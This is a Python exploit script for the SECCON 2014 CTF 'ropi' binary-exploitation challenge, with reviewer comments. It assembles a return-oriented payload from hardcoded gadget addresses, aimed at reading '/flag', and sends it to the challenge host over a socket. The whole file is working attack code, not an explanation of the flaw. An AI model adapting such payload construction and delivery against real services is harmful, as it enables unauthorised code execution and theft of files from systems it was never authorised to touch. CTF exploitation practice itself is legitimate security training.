from socket import *
from struct import pack, unpack
from commands import getoutput
from time import sleep
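# Exploit script for the SECCON 2014 CTF "ropi" pwn challenge (host/port below).
# Everything here is tied to that one 32-bit binary: the 0x0804xxxx / 0x080Cxxxx
# values are absolute addresses, so the binary is presumably non-PIE and the
# script will not work against anything else. The payload is built separately
# from the network I/O so its layout can be checked without a live target.
#
# NOTE(review): the file is Python 2 (`commands` module); this block uses only
# bytes literals and %-formatting so it also runs unchanged under Python 3,
# where str payloads would fail in send().

HOST = "ropi.pwn.seccon.jp"
PORT = 10000
BUF_CLONE = 0x080CB960       # address the payload is assumed to land at
MAX_PAYLOAD = 0x200          # bound the original asserted; presumably the server's read size -- verify
FLAG_PATH = b"/flag\x00\x00\x00"

# Kept for anyone who referenced the original module-level names.
buf_clone = BUF_CLONE
flag_addr = buf_clone + 264


def build_payload(base=BUF_CLONE):
    """Return the 312-byte payload as bytes.

    base: address the payload is assumed to be copied to (default BUF_CLONE).
          The pointer to the "/flag" string is computed relative to it, so the
          same layout can be re-targeted if the buffer address changes.
    Raises ValueError if the payload exceeds MAX_PAYLOAD (the original used an
    assert for this, which is stripped under `python -O`).

    The ebp-relative labels are the author's; by byte offset, ebp-0x44 at
    offset 204 puts ebp at offset 272, which would make offsets 260 and 264
    ebp-0xC and ebp-0x8 rather than the ebp-0x10/ebp-0xC labels the author
    wrote. The bytes are reproduced exactly as in the original; only the
    labels are in doubt.
    """
    flag_ptr = base + 264            # offset of FLAG_PATH below
    parts = [
        pack("<I", 0x08049322),      # author's note: "addr of buf_clone" (value is not BUF_CLONE; presumably a code address -- verify in the binary)
        b"a" * 200,                  # filler up to offset 204
        pack("<I", flag_ptr),        # ebp-0x44 (author's label): pointer to "/flag"
        pack("<I", base),            # ebp-0x40
        b"a" * 8,
        pack("<I", 0x080798C1),      # ebp-0x34: return/gadget address per author
        b"a" * 36,
        pack("<I", 0x0807D745),      # labelled ebp-0x10 (offset 260, see docstring)
        FLAG_PATH,                   # labelled ebp-0xC (offset 264 == flag_ptr - base)
        b"a" * 28,
        pack("<I", base),            # ebp+0x1C
        b"a" * 4,
        pack("<I", 0x7000000),       # ebp+0x24: meaning not stated in the original
    ]
    payload = b"".join(parts)
    if len(payload) > MAX_PAYLOAD:
        raise ValueError("payload is %d bytes, limit is %d" % (len(payload), MAX_PAYLOAD))
    return payload


def recv_all(sock, bufsize=4096):
    """Read from sock until the peer closes; return everything as bytes."""
    chunks = []
    while True:
        chunk = sock.recv(bufsize)
        if not chunk:
            break
        chunks.append(chunk)
    return b"".join(chunks)


def deliver(payload, host=HOST, port=PORT):
    """Connect to host:port, send payload, half-close, and return the reply.

    Uses sendall() rather than send() so a partial write cannot truncate the
    payload, and always closes the socket (the original leaked it). The
    original discarded whatever the service sent back; here it is returned
    so the caller can print it.
    """
    sock = socket(AF_INET, SOCK_STREAM)
    try:
        sock.connect((host, port))
        sock.sendall(payload)
        sleep(1)                     # original paused before the half-close; kept as-is
        sock.shutdown(SHUT_WR)
        return recv_all(sock)
    finally:
        sock.close()


if __name__ == "__main__":
    reply = deliver(build_payload())
    # latin-1 never fails to decode, so arbitrary bytes from the service are shown verbatim
    print(reply.decode("latin-1"))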